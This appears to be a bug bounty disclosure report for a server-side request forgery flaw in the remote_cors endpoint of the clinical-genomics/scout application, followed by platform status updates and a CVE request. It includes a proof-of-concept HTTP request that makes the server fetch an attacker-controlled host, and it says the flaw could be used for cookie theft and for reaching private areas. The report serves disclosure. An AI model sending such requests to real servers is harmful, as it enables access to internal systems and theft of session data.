Server-Side Request Forgery in scout in clinical-genomics/scout
Valid
Reported on
May 3rd 2022
Description
Server-Side Request Forgery in remote_cors
Proof of Concept
GET /remote/cors/http://<my-vps>:8888 HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost:8000/cust000/cases
Cookie: <cookies>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
PoC Image
Impact
An attacker could make the application perform arbitrary requests to fishing steal cookie, request to private area, or lead to xss...
We are processing your report and will contact the
clinical-genomics/scout
team within 24 hours.
21 days ago
Nhien.IT modified the report
21 days ago
Nhien.IT modified the report
21 days ago
Nhien.IT modified the report
20 days ago
We have contacted a member of the
clinical-genomics/scout
team and are waiting to hear back
20 days ago
The researcher's credibility has increased: +7
Chiara Rasi
has been awarded the fix bounty
Hi @maintainer, the fix is already released, can you assign a CVE here? if you can, hope @admin help
to join this conversation